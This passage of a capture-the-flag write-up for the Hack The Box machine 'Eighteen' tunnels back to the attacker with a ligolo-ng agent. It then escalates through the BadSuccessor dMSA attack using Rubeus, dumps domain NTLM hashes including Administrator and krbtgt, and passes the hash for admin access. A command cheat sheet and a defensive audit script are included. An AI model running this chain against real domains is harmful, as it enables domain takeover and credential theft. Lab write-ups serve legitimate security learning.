  TCP    0.0.0.0:57599          0.0.0.0:0              LISTENING       2636
  TCP    10.129.78.214:53       0.0.0.0:0              LISTENING       2656
  TCP    10.129.78.214:139      0.0.0.0:0              LISTENING       4
  TCP    10.129.78.214:5985     10.10.14.6:57228       ESTABLISHED     4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2656
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       2684
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:88                [::]:0                 LISTENING       820
  TCP    [::]:135               [::]:0                 LISTENING       396
  TCP    [::]:389               [::]:0                 LISTENING       820
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:464               [::]:0                 LISTENING       820
  TCP    [::]:593               [::]:0                 LISTENING       396
  TCP    [::]:636               [::]:0                 LISTENING       820
  TCP    [::]:1433              [::]:0                 LISTENING       2684
  TCP    [::]:3268              [::]:0                 LISTENING       820
  TCP    [::]:3269              [::]:0                 LISTENING       820
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:9389              [::]:0                 LISTENING       2560
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       820
  TCP    [::]:49665             [::]:0                 LISTENING       672
  TCP    [::]:49666             [::]:0                 LISTENING       1160
  TCP    [::]:49667             [::]:0                 LISTENING       1440
  TCP    [::]:49668             [::]:0                 LISTENING       820
  TCP    [::]:49680             [::]:0                 LISTENING       820
  TCP    [::]:49681             [::]:0                 LISTENING       820
  TCP    [::]:49684             [::]:0                 LISTENING       820
  TCP    [::]:49689             [::]:0                 LISTENING       808
  TCP    [::]:49703             [::]:0                 LISTENING       2656
  TCP    [::]:57599             [::]:0                 LISTENING       2636
  TCP    [::1]:53               [::]:0                 LISTENING       2656
  TCP    [::1]:389              [::1]:49682            ESTABLISHED     820
  TCP    [::1]:389              [::1]:49683            ESTABLISHED     820
  TCP    [::1]:389              [::1]:49702            ESTABLISHED     820
  TCP    [::1]:389              [::1]:63339            ESTABLISHED     820
  TCP    [::1]:1434             [::]:0                 LISTENING       2684
# [... cut ..]
PS C:\Users\adam.scott\Documents>

We start a new session with evil-winrm-py, upload the ligolo-ng agent to the machine and connect it back to our proxy.

evil-winrm-py PS C:\Users\adam.scott\Documents> upload ../www/agent.exe agent.exe
Uploading /home/kali/htb/www/agent.exe: 6.44MB [00:18, 362kB/s]                                                                                                                         
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\agent.exe
evil-winrm-py PS C:\Users\adam.scott\Documents> 
evil-winrm-py PS C:\Users\adam.scott\Documents> ./agent.exe -connect 10.10.14.64:443 -ignore-cert

Locally, after starting the proxy, we select the session, create an interface, start the tunnel and add a route for the target's local ports.

# localhost ports
sudo ./proxy -selfcert -laddr 0.0.0.0:443
session # select <eighteen session number>
interface_create --name eighteen
tunnel_start --tun eighteen
interface_add_route --name eighteen --route 240.0.0.0/4

We can see that, through the tunnel, we now reach the locally bound LDAP service.

❯ nxc ldap 240.0.0.0 -u adam.scott -p iloveyou1
LDAP        240.0.0.0       389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (signing:Enforced) (channel binding:No TLS cert) 
LDAP        240.0.0.0       389    DC01             [+] eighteen.htb\adam.scott:iloveyou1 

Privesc

After running SharpHound and BloodHound, no relevant permissions or groups were found for adam, only REMOTE MANAGEMENT USERS, which is what allows this user to access the host over WinRM.


BloodyAD - CREATE_CHILD

We run bloodyAD to list the objects on which adam has permissions. It shows that he holds CREATE_CHILD on the Staff OU.

❯ bloodyAD --host 240.0.0.0 -d eighteen.htb -u adam.scott -p iloveyou1 get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=eighteen,DC=htb
permission: WRITE

distinguishedName: OU=Staff,DC=eighteen,DC=htb
permission: CREATE_CHILD

distinguishedName: CN=adam.scott,OU=Staff,DC=eighteen,DC=htb
permission: WRITE

BadSuccessor

The CREATE_CHILD permission lets us carry out a “BadSuccessor” attack, which takes advantage of dMSA accounts and a permission over an OU.

Ref.
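From the defender's side, the following PowerShell audit is an added example (not code from the writeup or from the BadSuccessor tooling) that checks an OU for the two things this attack needs and leaves behind: non-default principals holding CreateChild on the OU (generic, or scoped to the dMSA object class), and dMSAs whose msDS-ManagedAccountPrecededByLink already points at another account. It assumes the RSAT ActiveDirectory module on a domain-joined host with a Windows Server 2025 schema; the function name Get-BadSuccessorExposure is mine.

```powershell
# Added audit example (not part of the original writeup). Assumes RSAT ActiveDirectory.
Import-Module ActiveDirectory

function Get-BadSuccessorExposure {
    [CmdletBinding()]
    param(
        # Distinguished name of the OU to audit, e.g. "OU=Staff,DC=eighteen,DC=htb"
        [Parameter(Mandatory)][string]$OU
    )

    # Resolve the schemaIDGUID of the dMSA class. A CreateChild ACE whose ObjectType is the
    # empty GUID applies to every child class; one whose ObjectType equals this GUID is
    # limited to dMSA objects, which is still enough for BadSuccessor.
    $schemaNC  = (Get-ADRootDSE).schemaNamingContext
    $dmsaClass = Get-ADObject -SearchBase $schemaNC `
        -LDAPFilter '(lDAPDisplayName=msDS-DelegatedManagedServiceAccount)' `
        -Properties schemaIDGUID
    if (-not $dmsaClass) {
        # Schema predates Windows Server 2025: no dMSA class, so this attack path does not exist.
        return [pscustomobject]@{ OU = $OU; DmsaSupported = $false; CreateChildGrants = @(); Successors = @() }
    }
    $dmsaGuid = [guid]$dmsaClass.schemaIDGUID

    # Principals expected to own the OU; anyone else with CreateChild is reported.
    $nb = (Get-ADDomain).NetBIOSName
    $expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                  "$nb\Domain Admins", "$nb\Enterprise Admins")

    $acl = Get-Acl -Path "AD:\$OU"
    $grants = @(foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # GenericAll implies CreateChild; WriteDacl/WriteOwner let the holder grant it to themselves.
        if ($ace.ActiveDirectoryRights -notmatch 'CreateChild|GenericAll|WriteDacl|WriteOwner') { continue }
        if ($ace.ObjectType -ne [guid]::Empty -and $ace.ObjectType -ne $dmsaGuid) { continue }
        if ($expected -contains $ace.IdentityReference.Value) { continue }
        [pscustomobject]@{
            Principal  = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights.ToString()
            ObjectType = if ($ace.ObjectType -eq [guid]::Empty) { 'any class' } else { 'dMSA only' }
            Inherited  = $ace.IsInherited
        }
    })

    # dMSAs already present whose "preceded by" link names another account are the artefact
    # BadSuccessor leaves behind (msDS-DelegatedMSAState 2 = migration marked as completed).
    $successors = @(Get-ADObject -SearchBase $OU `
        -LDAPFilter '(objectClass=msDS-DelegatedManagedServiceAccount)' `
        -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState, whenCreated |
      Where-Object { $_.'msDS-ManagedAccountPrecededByLink' } |
      ForEach-Object {
        [pscustomobject]@{
            dMSA           = $_.DistinguishedName
            Supersedes     = $_.'msDS-ManagedAccountPrecededByLink'
            MigrationState = $_.'msDS-DelegatedMSAState'
            Created        = $_.whenCreated
        }
      })

    [pscustomobject]@{
        OU                = $OU
        DmsaSupported     = $true
        CreateChildGrants = $grants
        Successors        = $successors
    }
}

# Usage on this page's domain: on Eighteen this lists adam.scott's CreateChild grant on the
# Staff OU and, after the attack, the 'bad' dMSA superseding Administrator.
Get-BadSuccessorExposure -OU 'OU=Staff,DC=eighteen,DC=htb' | Format-List
```

With object auditing enabled on the OU, the same two conditions surface in the Security log as event 5137 (object created, class msDS-DelegatedManagedServiceAccount) and 5136 (attribute msDS-ManagedAccountPrecededByLink modified), which makes a point-in-time audit like this one complementary to continuous detection.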

Exploit

To exploit this we use BadSuccessor, importing it with Import-Module.

evil-winrm-py PS C:\Users\adam.scott\Documents> upload ../www/BadSuccessor.ps1 BadSuccessor.ps1
Uploading /home/kali/htb/www/BadSuccessor.ps1: 100%|███████████████████████████████████████████████████████████████████████████████████████████████| 16.3k/16.3k [00:00<00:00, 77.2kB/s]
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\BadSuccessor.ps1
evil-winrm-py PS C:\Users\adam.scott\Documents> Import-Module ./BadSuccessor.ps1
evil-winrm-py PS C:\Users\adam.scott\Documents>

We run it specifying the OU, the dMSA name, our user and the privileged (target) user.

PS C:\users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name bad -DelegatedAdmin adam.scott -DelegateTarget Administrator -domain eighteen.htb
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Successfully created and configured dMSA 'bad'
Object adam.scott can now impersonate Administrator
PS C:\users\adam.scott\Documents>

With Rubeus we request a new ticket for our user.

PS C:\users\adam.scott\Documents> ./Rubeus2.3.exe asktgt /user:adam.scott /password:iloveyou1 /domain:eighteen.htb /dc:dc01.eighteen.htb /nowrap /opsec /force

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGT

[*] Using domain controller: dc01.eighteen.htb (fe80::285a:ee4c:16d2:ba3f%3)
[!] Pre-Authentication required!
[!]	AES256 Salt: EIGHTEEN.HTBadam.scott
[!]	AES128 Salt: EIGHTEEN.HTBadam.scott
[!]	Etype 23 Salt: <not provided>
[*] Using rc4_hmac hash: 9964DAE494A77414E34AFF4F34412166
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::285a:ee4c:16d2:ba3f%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEv+k1lN0M/0UViXZmpYoc2Vhurw5hY+Zbte4cFcKVnHia0DHHeEfhcQfvpAsmu82EFSKN8Rq2S135dR9M6e3eToS3fNrfBavs2bOCuK56O6Pzm6bj+g1Cm/ydhb6YQwarsFPzDnQKQLq6ozParO/fgXyM9EBzOsYlEzQox1scD1V4CCB7ZTQqqPou8/bv/aYsSKx3CAS9gGk8SExJxKvsV3jVNktZxciGEhufzVyfYVsubtAW+zztwyqQtP90xRAPA1+XM3/2iYl/FE5bJZ2zK7gPPyH52ek9m4hbwG2DdG1xoz9trJJaLLtViDS8CcGm8W/MJnWV+re08Qvn08RHxpGEpwCnLUUpagjCTbPQ7GNeFjCnozVfd6oqPn952EU4MbiwQI3mNc/SxdBNC8U3x+6JNkB9kxq60GjjgdSWyLXMakToB75jXY6EQAc2tHJ8PEid4YMq3MPbqj7AqxZt+nUEQghnVjUfixsjngY9lW8TF1vzMqbUvUQdxOwf/aKpQqRWgz5VLWXlcmLtOgBHuqxvYmJYjNw/5fPq5J04di/JfQiNl6AoLbz3CJwB8Svq6b8j81tNwBJw2JKUFshzXVPkDvwugzEUBXX5/tWoz3T7dbo4AgNVV7Yo8uHLkxM6nxh0t/VcbXySToziqygz8oa0xzXPW9tgilKtSds4Mz3wfljGitq4FMroY1L1jD8q3EHVbgXq/aeUT4yn3qegAe4iPbKK6yOzw1ZQXtl552FYeBLz4kcNlDP8D9jmut+WwPLL8/iMZ6+JkfIHvPyn+MFotCJRbsTqj0LOd+ZlhkkPnZWVJG1MZ0X1ACSwcMeR/YnAblzYxIkKb3Z0LeNXgLwFd8vyeJvUWPI2rXDiL6vkOl3k15SQ03qDQlwb+kUHo5OmymVpbkSEAfH7E6ETOW0+XFBGPm44wPKP9AKd2/WavbRdfBgrvpRTNQN39ofsDnoBr1qsMM3BJPrAMKujm1ABMT9ytgBnukxmE5dFPnyLruW+Cq/J9/UQJO9/H0edBS3ZzjXvgoyKENwceG3MWBUqaztPmwxz9pHwijbj15gdaBKgU2D4hD70/CeNTgAyrpB6GrKZ+01C5oUB+mv5kIm9RTNP23SoNjbry6NfHkyU146FxIdOzP40EtON8Z3oo6UDnBe5MFwdbjlz09ldTmJAt46s9mS/dIbYxHsTNi6BOuj0hMqbm+09yZVK1uRASWa+ugEhWe1+fgdxUpzKnC8OY5fzq54dsVD1V6lvzx1rD3GpE5M+lOf6J6lOjehZ8mphd7Ah/e8Vbjn0boh6TpKVStKD2nr9bZlnudOyRwWVIA1Sm70iNV/WD+jr1iQa2eT0pyF2mNWww2jmAsahAh++D8XFy6qM2+ws8WtL6CoYSotH7cE0CNMUDfr2IAOBMbADQa6mJumqwZA8ypa28YBgUSWki+U9CpehLI9DwW3mqYDWUECGQdZphLo4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQgApNigRhGT47Saq+XqVhvBcNjqpR0Fg+U64VPYCFrIKGhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTExNjA5NDQwNFqmERgPMjAyNTExMTYxOTQ0MDRapxEYDzIwMjUxMTIzMDk0NDA0WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg==

  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  adam.scott (NT_PRINCIPAL)
  UserRealm                :  EIGHTEEN.HTB
  StartTime                :  11/16/2025 1:44:04 AM
  EndTime                  :  11/16/2025 11:44:04 AM
  RenewTill                :  11/23/2025 1:44:04 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  ApNigRhGT47Saq+XqVhvBcNjqpR0Fg+U64VPYCFrIKE=
  ASREP (key)              :  9964DAE494A77414E34AFF4F34412166

PS C:\users\adam.scott\Documents>

We use this ticket to request a new one, this time for the dMSA that was just created.

PS C:\users\adam.scott\Documents> ./Rubeus2.3.exe asktgs /targetuser:bad$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /outfile:ticket.kirbi /ticket:doIFpjCC[...ticket...]R0hURUVOLkhUQg==

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'bad$' from 'adam.scott'
[+] Sequence number is: 993886314
[*] Using domain controller: DC01.eighteen.htb (fe80::285a:ee4c:16d2:ba3f%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):


  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  bad$ (NT_PRINCIPAL)
  UserRealm                :  eighteen.htb
  StartTime                :  11/16/2025 1:44:38 AM
  EndTime                  :  11/16/2025 1:59:38 AM
  RenewTill                :  11/23/2025 1:44:04 AM
  Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  tR7f4Z725JOBPPo7AlhgQzf4xGCalMJ3J2ZLXRl+gpA=
  Current Keys for bad$: (aes256_cts_hmac_sha1) A6EE5020CCF2EFA61CA2E2C9AAD7C7D34FF80CED71C367E7894992FD74260E04


[*] Ticket written to ticket.kirbi


PS C:\users\adam.scott\Documents>

We convert the ticket with ticketConverter.

❯ impacket-ticketConverter ticket.kirbi output.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

We use the ticket to run secretsdump and obtain the Administrator hash.

KRB5CCNAME=output.ccache faketime "$(ntpdate -q 240.0.0.1 | cut -d ' ' -f 1,2)" impacket-secretsdump eighteen.htb/bad\$@dc01.eighteen.htb -k -no-pass -just-dc-ntlm -dc-ip 240.0.0.1 -target-ip 240.0.0.1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
bad$:12607:aad3b435b51404eeaad3b435b51404ee:4450d68bd2b3f724e3f1eb747718bb43:::
[*] Cleaning up... 

BadSuccessor Commands Exploitation

# BadSuccessor commands
# Import Module
Import-Module ./BadSuccessor.ps1
# Run in Exploitation mode with the OU, dMSA account, low user and privileged user
BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name bad -DelegatedAdmin adam.scott -DelegateTarget Administrator -domain eighteen.htb
# request a ticket for the low user
./Rubeus2.3.exe asktgt /user:adam.scott /password:iloveyou1 /domain:eighteen.htb /dc:dc01.eighteen.htb /nowrap /opsec /force
# request a ticket with the low user ticket for the dMSA account
./Rubeus2.3.exe asktgs /targetuser:bad$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /outfile:ticket.kirbi /ticket:<ticket>
# convert the ticket (kirbi)
impacket-ticketConverter ticket.kirbi output.ccache
# request ntlm hash for users via secretsdump
KRB5CCNAME=output.ccache faketime "$(ntpdate -q 240.0.0.1 | cut -d ' ' -f 1,2)" impacket-secretsdump eighteen.htb/bad\$@dc01.eighteen.htb -k -no-pass -just-dc-ntlm -dc-ip 240.0.0.1 -target-ip 240.0.0.1

Shell

With the hash we obtain a new shell as administrator and read root.txt.

❯ evil-winrm-py -i eighteen.htb -u administrator -H 0b133be956bfaddf9cea56701affddec
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.5.0

[*] Connecting to 'eighteen.htb:5985' as 'administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> whoami
eighteen\administrator
evil-winrm-py PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
47705a51646fd9cbf77c57f30a9a7f2a
evil-winrm-py PS C:\Users\Administrator\Documents>

Dump Hashes

We dump the hashes with impacket-secretsdump.

❯ impacket-secretsdump administrator@dc01.eighteen.htb -hashes :0b133be956bfaddf9cea56701affddec -dc-ip 240.0.0.1 -target-ip 240.0.0.1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 


Cronjobs Cleanup

Locally there are two scripts that are used to keep the machine in its initial state.

evil-winrm-py PS C:\Users\Administrator\Documents> dir


    Directory: C:\Users\Administrator\Documents


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
-a----        10/29/2025   5:40 AM           1226 clean_OU.ps1                                                          
-a----         11/8/2025   7:18 AM            421 warmup_flask.ps1                                                      


evil-winrm-py PS C:\Users\Administrator\Documents> cat clean_OU.ps1
# Clean OU
Import-Module ActiveDirectory

$ou = "OU=Staff,DC=eighteen,DC=htb"

Get-ADObject -SearchBase $ou -Filter 'ObjectClass -eq "msDS-DelegatedManagedServiceAccount"' | ForEach-Object {
    Remove-ADObject -Identity $_.DistinguishedName -Confirm:$false
}

# Clean financial_planner database

$server = "127.0.0.1"
$database = "financial_planner"
$username = "appdev"
$password = 'MissThisElite$90'

$connectionString = "Server=$server;Database=$database;User ID=$username;Password=$password;TrustServerCertificate=True;"

$queries = @(
    "DELETE FROM users WHERE id > 1002;",
    "DELETE FROM incomes;",
    "DELETE FROM expenses;",
    "DELETE FROM allocations;"
)

$connection = New-Object System.Data.SqlClient.SqlConnection
$connection.ConnectionString = $connectionString

try {
    $connection.Open()
    foreach ($query in $queries) {
        $command = $connection.CreateCommand()
        $command.CommandText = $query

        $rowsAffected = $command.ExecuteNonQuery()
        Write-Output "Executed: $query"
        Write-Output "Rows affected: $rowsAffected`n"
    }
}
catch {
    Write-Error "Error: $($_.Exception.Message)"
}
finally {
    $connection.Close()
}
evil-winrm-py PS C:\Users\Administrator\Documents> cat warmup_flask.ps1
Import-Module WebAdministration
$siteName = "financial_planner"

while (($site = Get-Website -Name $siteName) -and $site.state -ne "Started") {
    Start-Sleep -Seconds 1
}

Restart-WebItem "IIS:\Sites\$siteName"
Start-Sleep -Seconds 2

try {
    Invoke-WebRequest -Uri "http://eighteen.htb/" -UseBasicParsing -TimeoutSec 10 | Out-Null
} catch {
    Write-Warning "Could not reach the site for warmup: $_"
}
evil-winrm-py PS C:\Users\Administrator\Documents>

Dany Sucuc
WRITTEN BY
sckull